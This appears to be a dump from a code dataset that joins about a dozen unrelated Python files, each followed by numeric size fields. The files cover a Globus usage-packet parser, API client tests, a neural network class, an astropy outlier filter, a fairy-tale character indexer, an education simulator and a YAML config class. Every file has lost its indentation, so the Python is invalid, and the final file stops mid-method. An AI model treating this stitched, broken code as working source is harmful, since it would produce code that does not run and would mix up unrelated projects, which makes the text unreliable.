def pink(obj):
return magenta(obj)
| 624 | 271 |
"""Export data"""
from scipy.io import savemat
def mat(filename, mdict):
"""Export dictionary to .mat file for MATLAB"""
savemat(filename, mdict)
| 158 | 54 |
# Copyright 1999-2009 University of Chicago
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Object definition for processing C WS Core (version 2) usage packets.
"""
from globus.usage.cwscorev1packet import CWSCoreV1Packet
class CWSCoreV2Packet(CWSCoreV1Packet):
"""
C WS Core Usage Packet (version 2). Adds a container id, start/stop events
and service list
"""
insert_statement = '''
INSERT INTO c_ws_core_packets(
component_code,
version_code,
send_time,
ip_address,
container_id,
event_type,
service_list)
VALUES (%s, %s, %s, %s, %s, %s, %s)'''
def values(self, dbclass):
"""
Return a values tuple which matches the parameters in the class's
insert_statement.
Arguments:
self -- A CWSCoreV2Packet object
dbclass -- Database driver module for driver-specific type bindings
Returns:
Tuple containing
(component_code, version_code, send_time, ip_address,
container_id, event_type, service_list)
"""
return (
self.component_code,
self.packet_version,
dbclass.Timestamp(*self.send_time),
self.ip_address,
self.data.get('ID'),
self.data.get('EVENT'),
self.data.get('SERVICES'))
| 1,932 | 560 |
import pytest
from unittest.mock import patch, AsyncMock, create_autospec, MagicMock
from mindsync.api import AsyncApi, MindsyncApiError, DEFAULT_BASE_URL
from aiohttp import ClientResponse, ClientConnectionError, FormData
from io import IOBase
API_KEY = 'an-api-key'
USER_ID = 'an-user-id'
RESPONSE_RV = dict(result=dict(first_name='Elvis', last_name='Presley'), whatever='whatever')
ERROR_RESPONSE_RV = dict(error=dict(code=400, name='StatusError', message='Something wrong happens'), result=None, whatever='whatever')
RIG_ID = 'a-rig-id'
RENT_ID = 'a-rent-id'
API_VERSION = '1.0'
PROXY_URL = 'http://localhost:8080'
SOME_FN = 'filename.py'
CODE_ID = 'code-id'
RENT_ID = 'rent-id'
UUID = 'uuid'
@pytest.fixture
def api_key():
return API_KEY
@pytest.fixture
def sut(api_key):
return AsyncApi(api_key)
@pytest.fixture
def raise_sut(api_key):
return AsyncApi(api_key, raise_for_error=True)
@pytest.fixture
def resp_mock():
mock = create_autospec(spec=ClientResponse, spec_set=True, instance=True)
mock.json.return_value = RESPONSE_RV
return mock
@pytest.fixture
def err_resp_mock():
mock = create_autospec(spec=ClientResponse, spec_set=True, instance=True)
mock.json.return_value = ERROR_RESPONSE_RV
return mock
@pytest.fixture
def open_mock():
with patch('builtins.open') as mock:
yield mock
class FormDataMatcher(FormData):
def __eq__(self, other):
return self._fields == other._fields
@pytest.fixture
def form_data(open_mock):
data = FormDataMatcher()
data.add_field('file', open_mock.return_value, content_type='application/octet-stream')
data.add_field('isPrivate', 'false')
return data
@pytest.fixture
def aiohttp_request_mock(resp_mock):
with patch('aiohttp.request') as mock:
mock.return_value.__aenter__.return_value = resp_mock
yield mock
@pytest.fixture
def err_aiohttp_request_mock(err_resp_mock):
with patch('aiohttp.request') as mock:
mock.return_value.__aenter__.return_value = err_resp_mock
yield mock
@pytest.mark.asyncio
@pytest.mark.parametrize('user_id, url, kwargs, expected_result',
[(None, f'{DEFAULT_BASE_URL}/api/1.0/users/client/profile', dict(), RESPONSE_RV['result']),
(USER_ID, f'{DEFAULT_BASE_URL}/api/1.0/users/profile/{USER_ID}', dict(meta=None), RESPONSE_RV)])
async def test_profile_must_do_proper_http_request(sut, user_id, url, kwargs, expected_result, api_key, aiohttp_request_mock):
result = await sut.profile(user_id, **kwargs)
assert expected_result == result
aiohttp_request_mock.assert_called_with(method='GET', url=url, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_profile_must_raise_if_request_fails(sut, aiohttp_request_mock):
aiohttp_request_mock.side_effect = ClientConnectionError
with pytest.raises(MindsyncApiError):
await sut.profile()
@pytest.mark.asyncio
async def test_profile_must_raise_if_result_is_malformed(sut, resp_mock, aiohttp_request_mock):
resp_mock.json.return_value = dict()
with pytest.raises(MindsyncApiError):
await sut.profile()
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(first_name='Jim', last_name='Carrey', phone='1234567'),
dict(lastName='Carrey', firstName='Jim', phone='1234567'))])
async def test_set_profile_must_do_proper_http_request(sut, args, expected_args, api_key,
aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.set_profile(**args)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='PUT',
url=f'{DEFAULT_BASE_URL}/api/1.0/users/client/profile',
json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
# RIGS
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_url', [(dict(my=True), f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/my'),
(dict(my=False), f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs')])
async def test_rigs_list_must_do_proper_http_request(sut, args, expected_url, api_key, aiohttp_request_mock):
result = await sut.rigs_list(**args)
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='GET', url=expected_url, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rigs_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
result = await sut.rig_info(rig_id=RIG_ID)
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}/state', proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rig_price_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
result = await sut.rig_price(rig_id=RIG_ID)
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}/price', proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rigs_info_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
rv = ERROR_RESPONSE_RV
with pytest.raises(MindsyncApiError) as exc_info:
await raise_sut.rig_info(rig_id=RIG_ID)
exc = exc_info.value
assert exc.args[0] == rv['error']['code']
assert exc.args[1] == rv['error']['name']
assert exc.args[2] == rv['error']['message']
assert exc.args[3] == rv
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args, expected_result', [
(dict(rig_id=RIG_ID, enable=True, power_cost=0.25, meta=None), dict(isEnable=True, powerCost=0.25), RESPONSE_RV),
(dict(rig_id=RIG_ID, enable=True, power_cost=0.25), dict(isEnable=True, powerCost=0.25), RESPONSE_RV['result']),
])
async def test_set_rig_must_do_proper_http_request(sut, args, expected_args, expected_result, api_key,
aiohttp_request_mock, resp_mock):
result = await sut.set_rig(**args)
assert expected_result == result
aiohttp_request_mock.assert_called_with(method='PUT',
url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rigs/{RIG_ID}',
json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
# RENTS
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(rig_id=RIG_ID, tariff_name='demo'),
dict(rigHash=RIG_ID, tariffName='demo'))])
async def test_start_rent_must_do_proper_http_request(sut, args, expected_args, api_key,
aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.start_rent(**args)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='POST',
url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/start',
json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_start_rent_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
rv = ERROR_RESPONSE_RV
args = dict(rig_id=RIG_ID, tariff_name='demo')
with pytest.raises(MindsyncApiError) as exc_info:
rv = await raise_sut.start_rent(**args)
exc = exc_info.value
assert exc.args[0] == rv['error']['code']
assert exc.args[1] == rv['error']['name']
assert exc.args[2] == rv['error']['message']
assert exc.args[3] == rv
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args, expected_result', [(dict(rent_id=RENT_ID, meta=None), dict(hash=RENT_ID), RESPONSE_RV),
(dict(rent_id=RENT_ID), dict(hash=RENT_ID), RESPONSE_RV['result'])])
async def test_stop_rent_must_do_proper_http_request(sut, args, expected_args, expected_result, api_key,
aiohttp_request_mock, resp_mock):
result = await sut.stop_rent(**args)
assert expected_result == result
aiohttp_request_mock.assert_called_with(method='POST',
url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/stop',
json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_state_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.rent_state(uuid=UUID)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}', proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_states_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.rent_states(uuid=UUID)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}/states', proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_rent_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.rent_state(uuid=UUID)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='GET', url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{UUID}', proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(rent_id=RENT_ID, enable=True, login='login', password='password'),
dict(isEnable=True, login='login', password='password'))])
async def test_set_rent_must_do_proper_http_request(sut, args, expected_args, api_key,
aiohttp_request_mock, resp_mock):
resp_mock.json.return_value = dict(result='OK')
result = await sut.set_rent(**args)
assert 'OK' == result
aiohttp_request_mock.assert_called_with(method='PUT',
url=f'{DEFAULT_BASE_URL}/api/{API_VERSION}/rents/{RENT_ID}',
json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_set_rent_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock):
rv = ERROR_RESPONSE_RV
args = dict(rent_id=RENT_ID, enable=True, login='login', password='password')
with pytest.raises(MindsyncApiError) as exc_info:
rv = await raise_sut.set_rent(**args)
exc = exc_info.value
assert exc.args[0] == rv['error']['code']
assert exc.args[1] == rv['error']['name']
assert exc.args[2] == rv['error']['message']
assert exc.args[3] == rv
# CODES
@pytest.mark.asyncio
async def test_codes_list_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
result = await sut.codes_list(proxy=PROXY_URL)
expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes'
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='GET', url=expected_url, proxy=PROXY_URL,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_create_code_must_do_proper_http_request(sut, api_key, aiohttp_request_mock, open_mock, form_data):
result = await sut.create_code(proxy=PROXY_URL, file=SOME_FN)
expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes'
# data = dict(file=open_mock.return_value, isPrivate='false')
data=form_data
open_mock.assert_called_with(SOME_FN, 'rb')
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='POST', url=expected_url, proxy=PROXY_URL,
data=form_data, headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_create_code_must_raise_on_error_if_raise_for_error_set(raise_sut, api_key, err_aiohttp_request_mock, open_mock):
rv = ERROR_RESPONSE_RV
args = dict(rent_id=RENT_ID, enable=True, login='login', password='password')
with pytest.raises(MindsyncApiError) as exc_info:
rv = await raise_sut.create_code(proxy=PROXY_URL, file=SOME_FN)
exc = exc_info.value
assert exc.args[0] == rv['error']['code']
assert exc.args[1] == rv['error']['name']
assert exc.args[2] == rv['error']['message']
assert exc.args[3] == rv
@pytest.mark.asyncio
async def test_run_code_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
result = await sut.run_code(code_id=CODE_ID, rent_id=RENT_ID)
expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes/{CODE_ID}/run'
data=form_data
assert RESPONSE_RV['result'] == result
expected_args = dict(rentHash=RENT_ID)
aiohttp_request_mock.assert_called_with(method='POST', url=expected_url, json=expected_args, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
@pytest.mark.asyncio
async def test_code_info_must_do_proper_http_request(sut, api_key, aiohttp_request_mock):
result = await sut.code_info(code_id=CODE_ID)
expected_url = f'{DEFAULT_BASE_URL}/api/{API_VERSION}/codes/{CODE_ID}'
assert RESPONSE_RV['result'] == result
aiohttp_request_mock.assert_called_with(method='GET', url=expected_url, proxy=None,
headers={'api-key': api_key}, raise_for_status=False)
| 15,124 | 5,152 |
from unittest import TestCase
from unittest.mock import patch, MagicMock
from requests import Response
from looker_prometheus_exporter.looker_metric_fetcher import LookerMetricFetcher
from looker_prometheus_exporter.looker_auth import LookerAuthenticationError
class TestMetricFetcher(TestCase):
@patch("requests.post")
@patch("looker_prometheus_exporter.looker_metric_fetcher.LookerAuth.get_token", return_value="i_r_bad_token")
def test_raises_auth_error_appropriately(self, mocked_token_getter, mocked_post):
metric_fetcher = LookerMetricFetcher(
client_id="i_r_id", client_secret="i_r_secret", looker_base_url="https://example.com", dashboard_id=42
)
mock_response = MagicMock(Response)
mocked_post.return_value = mock_response
mock_response.status_code = 401
mock_response.json.return_value = {
"message": "Requires authentication.",
"documentation_url": "http://docs.looker.com/"
}
with self.assertRaises(LookerAuthenticationError):
metric_fetcher._fetch_metrics()
| 1,101 | 340 |
import tensorflow as tf
from .base import BaseNet
class xNN(BaseNet):
"""
Explainable neural network (xNN).
xNN is based on the Explainable neural network (Joel et al. 2018) with the following implementation details:
1. Categorical variables should be first converted by one-hot encoding, and we directly link each of the dummy variables as a bias term to final output.
2. The projection layer weights are initialized with univariate coefficient or combination of coefficients, considering the number of subnetworks. See the projection_layer function for details.
3. We train the network and early stop if no improvement occurs in certain epochs.
4. The subnetworks whose scaling factors are close to zero are pruned for parsimony consideration.
5. The pruned network will then be fine-tuned.
Parameters
----------
:type subnet_num: int
:param subnet_num: the number of subnetworks.
:type meta_info: dict
:param meta_info: the meta information of the dataset.
:type subnet_arch: list
:param subnet_arch: optional, default=(10, 6).
The architecture of each subnetworks, the ith element represents the number of neurons in the ith layer.
:type task_type: string
:param task_type: optional, one of {"Regression", "Classification"}, default="Regression". Only support binary classification at current version.
:type batch_size: int
:param batch_size: optional, default=1000, size of minibatches for stochastic optimizers.
:type training_epochs: int
:param training_epochs: optional, default=10000, maximum number of training epochs.
:type activation: tf object
:param activation: optional, default=tf.tanh, activation function for the hidden layer of subnetworks. It can be any tensorflow activation function object.
:type lr_bp: float
:param lr_bp: optional, default=0.001, learning rate for weight updates.
:type beta_threshold: float
:param beta_threshold: optional, default=0.01, percentage threshold for pruning the subnetworks, which means the subnetworks that sum up to 95% of the total sclae will be kept.
:type tuning_epochs: int
:param tuning_epochs: optional, default=500, the number of tunning epochs.
:type l1_proj: float
:param l1_proj: optional, default=0.001, the strength of L1 penalty for projection layer.
:type l1_subnet: float
:param l1_subnet: optional, default=0.001, the strength of L1 penalty for scaling layer.
:type verbose: bool
:param verbose: optional, default=False. If True, detailed messages will be printed.
:type val_ratio: float
:param val_ratio: optional, default=0.2. The proportion of training data to set aside as validation set for early stopping. Must be between 0 and 1.
:type early_stop_thres: int
:param early_stop_thres: optional, default=1000. Maximum number of epochs if no improvement occurs.
:type random_state: int
:param random_state: optional, default=0, the random seed.
References
----------
.. J. Vaughan, A. Sudjianto, E. Brahimi, J. Chen, and V. N. Nair, "Explainable neural networks based on additive index models," The RMA Journal, pp. 40-49, October 2018.
"""
def __init__(self, subnet_num, meta_info, subnet_arch=[10, 6], task_type="Regression",
activation_func=tf.tanh, batch_size=1000, training_epochs=10000, lr_bp=0.001,
beta_threshold=0.05, tuning_epochs=500, l1_proj=0.001, l1_subnet=0.001,
verbose=False, val_ratio=0.2, early_stop_thres=1000, random_state=0):
super(xNN, self).__init__(meta_info=meta_info,
subnet_num=subnet_num,
subnet_arch=subnet_arch,
task_type=task_type,
proj_method="random",
activation_func=activation_func,
bn_flag=False,
lr_bp=lr_bp,
l1_proj=l1_proj,
l1_subnet=l1_subnet,
l2_smooth=0,
batch_size=batch_size,
training_epochs=training_epochs,
tuning_epochs=tuning_epochs,
beta_threshold=beta_threshold,
verbose=verbose,
val_ratio=val_ratio,
early_stop_thres=early_stop_thres,
random_state=random_state)
@tf.function
def train_step_init(self, inputs, labels):
with tf.GradientTape() as tape:
pred = self.__call__(inputs, training=True)
pred_loss = self.loss_fn(labels, pred)
regularization_loss = tf.math.add_n(self.proj_layer.losses + self.output_layer.losses)
total_loss = pred_loss + regularization_loss
grads = tape.gradient(total_loss, self.trainable_weights)
self.optimizer.apply_gradients(zip(grads, self.trainable_weights))
@tf.function
def train_step_finetune(self, inputs, labels):
with tf.GradientTape() as tape:
pred = self.__call__(inputs, training=True)
pred_loss = self.loss_fn(labels, pred)
total_loss = pred_loss
train_weights_list = []
trainable_weights_names = [self.trainable_weights[j].name for j in range(len(self.trainable_weights))]
for i in range(len(self.trainable_weights)):
if self.trainable_weights[i].name != self.proj_layer.weights[0].name:
train_weights_list.append(self.trainable_weights[i])
grads = tape.gradient(total_loss, train_weights_list)
self.optimizer.apply_gradients(zip(grads, train_weights_list))
| 5,801 | 1,767 |
# https://stackoverflow.com/questions/6028000/how-to-read-a-static-file-from-inside-a-python-package
# see above how to read in words from the files...
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from random import choice as randchoice
from random import shuffle
class WordGenerator:
def __init__(self, debug=False):
self.data = {}
self.codes = [
"ADJ", "ADP", "CONJ", "DET", "NOUN",
"NUM", "PRON", "PRT", "VERB", "NAME"
]
self.debug = debug
self._load()
def _load(self):
for name in self.codes:
self.data[name] = pkg_resources.read_text(
"randomwordz.data",
f"{name}.txt"
).split('\n')
def _debug_msg(self, code):
if code not in self.data and self.debug:
print(f"Code {code} is invalid, try one of these:")
print(self.codes)
def get_all(self, code):
"""Returns all of a certain word type"""
code = code.upper()
self._debug_msg(code)
return list(self.data.get(code, []))
def get_all_random(self, code):
"""Returns all of a certain word type, randomized"""
code = code.upper()
self._debug_msg(code)
l = list(self.data.get(code, []))
shuffle(l)
return l
def get_random(self, code):
"""Returns a random word from the specified code"""
code = code.upper()
self._debug_msg(code)
try:
return randchoice(self.data.get(code, []))
except:
return ""
| 1,708 | 532 |
numeros = list()
while True:
digitado = (int(input('Digite os valores: ')))
if digitado not in numeros[:]:
print('Número adicionado com sucesso...')
else:
numeros.remove(digitado)
print('Erro! Valor já digitado')
numeros.append(digitado)
parada = str(input('Quer adicionar mais valores[S/N]? ')).upper().strip()
while parada not in 'SN':
parada = str(input('Quer adicionar mais valores[S/N]? ')).upper().strip()
if 'N' in parada:
break
numeros.sort()
print(f'Os números digitados foram: {numeros} (estão ordenados)') | 588 | 207 |
class Solution:
def numWays(self, n: int) -> int:
if n == 0: return 1
if n < 3: return n
f1, f2 = 1, 2
for _ in range(2, n):
f1, f2 = f2, (f1 + f2) % 1000000007
return f2
| 199 | 101 |
import numpy as np
from astropy.convolution import Box1DKernel, convolve
from astropy.stats import sigma_clip
def clip_outliers(data, log, wavelength, sigma=10, box_width=5, maxiters=5, fill_value='mask', verbose=False):
'''Find outliers in 1D time series.
Be careful when using this function on a time-series with known astrophysical variations. The variable
box_width should be set to be significantly smaller than any astrophysical variation timescales otherwise
these signals may be clipped.
Parameters
----------
data: ndarray (1D, float)
The input array in which to identify outliers
log: logedit.Logedit
The open log in which notes from this step can be added.
wavelength: float
The wavelength currently under consideration.
sigma: float
The number of sigmas a point must be from the rolling mean to be considered an outlier
box_width: int
The width of the box-car filter (used to calculated the rolling median) in units of number of data points
maxiters: int
The number of iterations of sigma clipping that should be performed.
fill_value: string or float
Either the string 'mask' to mask the outlier values, 'boxcar' to replace data with the mean from the box-car filter, or a constant float-type fill value.
Returns
-------
data: ndarray (1D, boolean)
An array with the same dimensions as the input array with outliers replaced with fill_value.
Notes
-----
History:
- Jan 29-31, 2022 Taylor Bell
Initial version, added logging
'''
kernel = Box1DKernel(box_width)
# Compute the moving mean
smoothed_data = convolve(data, kernel, boundary='extend')
# Compare data to the moving mean (to remove astrophysical signals)
residuals = data-smoothed_data
# Sigma clip residuals to find bad points in data
residuals = sigma_clip(residuals, sigma=sigma, maxiters=maxiters, cenfunc=np.ma.median)
outliers = np.ma.getmaskarray(residuals)
if np.any(outliers) and verbose:
log.writelog('Identified {} outliers for wavelength {}'.format(np.sum(outliers), wavelength))
# Replace clipped data
if fill_value=='mask':
data = np.ma.masked_where(outliers, data)
elif fill_value=='boxcar':
data = replace_moving_mean(data, outliers, kernel)
else:
data[outliers] = fill_value
return data, np.sum(outliers)
def replace_moving_mean(data, outliers, kernel):
'''Replace clipped values with the mean from a moving mean.
Parameters
----------
data: ndarray (1D, float)
The input array in which to replace outliers
outliers: ndarray (1D, bool)
The input array in which to replace outliers
kernel: astropy.convolution.Kernel1D
The kernel used to compute the moving mean.
Returns
-------
data: ndarray (boolean)
An array with the same dimensions as the input array with outliers replaced with fill_value.
Notes
-----
History:
- Jan 29, 2022 Taylor Bell
Initial version
'''
# First set outliers to NaN so they don't bias moving mean
data[outliers] = np.nan
smoothed_data = convolve(data, kernel, boundary='extend')
# Replace outliers with value of moving mean
data[outliers] = smoothed_data[outliers]
return data
| 3,403 | 1,000 |
from collections import defaultdict
import string
CHARACTERS = ['Red Riding Hood',
# we're omitting 'mother' here for simplicity
# (= substring grandmother)
('Grandmother', 'Grandma', 'Granny'),
'wolf', 'woodsman']
text = """
Once upon a time, there was a little girl who lived in a village near the forest. Whenever she went out, the little girl wore a red riding cloak, so everyone in the village called her Little Red Riding Hood.
One morning, Little Red Riding Hood asked her mother if she could go to visit her grandmother as it had been awhile since they'd seen each other.
"That's a good idea," her mother said. So they packed a nice basket for Little Red Riding Hood to take to her grandmother.
When the basket was ready, the little girl put on her red cloak and kissed her mother goodbye.
"Remember, go straight to Grandma's house," her mother cautioned. "Don't dawdle along the way and please don't talk to strangers! The woods are dangerous."
"Don't worry, mommy," said Little Red Riding Hood, "I'll be careful."
But when Little Red Riding Hood noticed some lovely flowers in the woods, she forgot her promise to her mother. She picked a few, watched the butterflies flit about for awhile, listened to the frogs croaking and then picked a few more.
Little Red Riding Hood was enjoying the warm summer day so much, that she didn't notice a dark shadow approaching out of the forest behind her...
Suddenly, the wolf appeared beside her.
"What are you doing out here, little girl?" the wolf asked in a voice as friendly as he could muster.
"I'm on my way to see my Grandma who lives through the forest, near the brook," Little Red Riding Hood replied.
Then she realized how late she was and quickly excused herself, rushing down the path to her Grandma's house.
The wolf, in the meantime, took a shortcut...
The wolf, a little out of breath from running, arrived at Grandma's and knocked lightly at the door.
"Oh thank goodness dear! Come in, come in! I was worried sick that something had happened to you in the forest," said Grandma thinking that the knock was her granddaughter.
The wolf let himself in. Poor Granny did not have time to say another word, before the wolf gobbled her up!
The wolf let out a satisfied burp, and then poked through Granny's wardrobe to find a nightgown that he liked. He added a frilly sleeping cap, and for good measure, dabbed some of Granny's perfume behind his pointy ears.
A few minutes later, Red Riding Hood knocked on the door. The wolf jumped into bed and pulled the covers over his nose. "Who is it?" he called in a cackly voice.
"It's me, Little Red Riding Hood."
"Oh how lovely! Do come in, my dear," croaked the wolf.
When Little Red Riding Hood entered the little cottage, she could scarcely recognize her Grandmother.
"Grandmother! Your voice sounds so odd. Is something the matter?" she asked.
"Oh, I just have touch of a cold," squeaked the wolf adding a cough at the end to prove the point.
"But Grandmother! What big ears you have," said Little Red Riding Hood as she edged closer to the bed.
"The better to hear you with, my dear," replied the wolf.
"But Grandmother! What big eyes you have," said Little Red Riding Hood.
"The better to see you with, my dear," replied the wolf.
"But Grandmother! What big teeth you have," said Little Red Riding Hood her voice quivering slightly.
"The better to eat you with, my dear," roared the wolf and he leapt out of the bed and began to chase the little girl.
Almost too late, Little Red Riding Hood realized that the person in the bed was not her Grandmother, but a hungry wolf.
She ran across the room and through the door, shouting, "Help! Wolf!" as loudly as she could.
A woodsman who was chopping logs nearby heard her cry and ran towards the cottage as fast as he could.
He grabbed the wolf and made him spit out the poor Grandmother who was a bit frazzled by the whole experience, but still in one piece."Oh Grandma, I was so scared!" sobbed Little Red Riding Hood, "I'll never speak to strangers or dawdle in the forest again."
"There, there, child. You've learned an important lesson. Thank goodness you shouted loud enough for this kind woodsman to hear you!"
The woodsman knocked out the wolf and carried him deep into the forest where he wouldn't bother people any longer.
Little Red Riding Hood and her Grandmother had a nice lunch and a long chat.
"""
def make_character_index(text=text, characters=CHARACTERS):
"""Return a dict with keys are characters (lowercased) and values
the lines they appear in sorted order.
Matches should be case insensitive.
If a character has multiple synonyms
- e.g. ('Grandmother', 'Grandma', 'Granny') -
then return the former as key.
"""
index_dict = defaultdict(list)
#unique_words = set()
lower_text = text.lower()
strip_punc = lower_text.translate(str.maketrans('','',string.punctuation))
#strip_punc = strip_punc.replace('\n', " ")
#for word in strip_punc.split(" "):
# unique_words.add(word)
#unique_words.remove("")
for word in characters:
if type(word) == tuple:
word_to_use = word[0].lower()
for i in range(len(strip_punc.splitlines())):
if any(words.lower() in strip_punc.splitlines()[i] for words in word):
index_dict[word_to_use].append(i)
else:
for i in range(len(strip_punc.splitlines())):
if word.lower() in strip_punc.splitlines()[i]:
index_dict[word.lower()].append(i)
return index_dict
pass | 5,697 | 1,630 |
import pandas
data = pandas.read_csv('data/gapminder_gdp_oceania.csv')
print(data)
| 83 | 33 |
# coding: utf-8
# 2019/11/26 @ tongshiwei
import numpy as np
import random
import math
import networkx as nx
from EduSim.Envs.meta import MetaLearner, MetaInfinityLearnerGroup, MetaLearningModel, Item
from EduSim.Envs.shared.KSS_KES.KS import influence_control
__all__ = ["Learner", "LearnerGroup"]
class LearningModel(MetaLearningModel):
def __init__(self, state, learning_target, knowledge_structure, last_visit=None):
self._state = state
self._target = learning_target
self._ks = knowledge_structure
self._ks_last_visit = last_visit
def step(self, state, knowledge):
if self._ks_last_visit is not None:
if knowledge not in influence_control(
self._ks, state, self._ks_last_visit, allow_shortcut=False, target=self._target,
)[0]:
return
self._ks_last_visit = knowledge
# capacity growth function
discount = math.exp(sum([(5 - state[node]) for node in self._ks.predecessors(knowledge)] + [0]))
ratio = 1 / discount
inc = (5 - state[knowledge]) * ratio * 0.5
def _promote(_ind, _inc):
state[_ind] += _inc
if state[_ind] > 5:
state[_ind] = 5
for node in self._ks.successors(_ind):
_promote(node, _inc * 0.5)
_promote(knowledge, inc)
class Learner(MetaLearner):
def __init__(self,
initial_state,
knowledge_structure: nx.DiGraph,
learning_target: set,
_id=None,
seed=None):
super(Learner, self).__init__(user_id=_id)
self.learning_model = LearningModel(
initial_state,
learning_target,
knowledge_structure,
)
self.structure = knowledge_structure
self._state = initial_state
self._target = learning_target
self._logs = []
self.random_state = np.random.RandomState(seed)
def update_logs(self, logs):
self._logs = logs
@property
def profile(self):
return {
"id": self.id,
"logs": self._logs,
"target": self.target
}
def learn(self, learning_item: Item):
self.learning_model.step(self._state, learning_item.knowledge)
@property
def state(self):
return self._state
def response(self, test_item: Item) -> ...:
return self._state[test_item.knowledge]
@property
def target(self):
return self._target
class LearnerGroup(MetaInfinityLearnerGroup):
def __init__(self, knowledge_structure, seed=None):
super(LearnerGroup, self).__init__()
self.knowledge_structure = knowledge_structure
self.random_state = np.random.RandomState(seed)
def __next__(self):
knowledge = self.knowledge_structure.nodes
return Learner(
[self.random_state.randint(-3, 0) - (0.1 * i) for i, _ in enumerate(knowledge)],
self.knowledge_structure,
set(self.random_state.choice(len(knowledge), self.random_state.randint(3, len(knowledge)))),
)
| 3,164 | 955 |
# coding=utf-8
"""
Class for YAML-based (roundtrip) configurations
This is a mutable configuration that keeps track of both structure and comments, and allows you to add comments
in certain circumstances as well.
To make use of this, make sure you use the `fmt` argument of the `get_config()` function in the storage manager. For
example:
>>> manager = ultros.storage_manager
>>> config_obj = manager.get_config("test.yml", fmt="yaml-roundtrip")
>>>
"""
from typing import Any, List, Dict
from ruamel import yaml
from ruamel.yaml.comments import CommentedMap, NoComment
from ultros.core.storage import manager as m
from ultros.core.storage.base import MutableAbstractDictFunctionsMixin, MutableAbstractItemAccessMixin
from ultros.core.storage.config.base import MutableConfigFile
__author__ = "Gareth Coles"
class YAMLRoundtripConfig(MutableConfigFile, MutableAbstractItemAccessMixin, MutableAbstractDictFunctionsMixin):
"""
Class for YAML-based (roundtrip) configurations
"""
def __init__(self, owner: Any, manager: "m.StorageManager", path: str, *args: List[Any], **kwargs: Dict[Any, Any]):
self.data = CommentedMap()
super().__init__(owner, manager, path, *args, **kwargs)
def load(self):
with open(self.path, "r") as fh:
